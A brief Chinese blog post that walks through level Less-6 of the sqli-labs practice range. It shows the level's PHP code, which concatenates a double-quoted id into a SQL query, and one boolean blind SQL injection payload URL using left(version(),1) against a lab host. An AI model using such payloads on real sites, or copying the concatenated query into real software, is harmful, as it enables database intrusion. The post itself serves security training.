sqli-labs靶场Less-6 发表于 2020-09-24 更新于 2020-10-20 分类于 sqli-labs靶场 阅读次数: 本文字数: 330 阅读时长 ≈ 1 分钟 Less6 Less6 与 less5 的区别在于 less6 在 id 参数传到服务器时,对 id 参数进行了处理。这里可以从源代码中可以看到。 12$id = '"'.$id.'"';$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; 这一关的策略和less5是一样的,只需要将’换为”即可 演示其中一个payload。使用left()函数布尔注入 1http://47.101.62.20:11567/Less-6/?id=1%22and%20left(version(),1)=5--+ 本文作者: hzktester 本文链接: https://www.hzktester.top/posts/3ef022d0.html 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!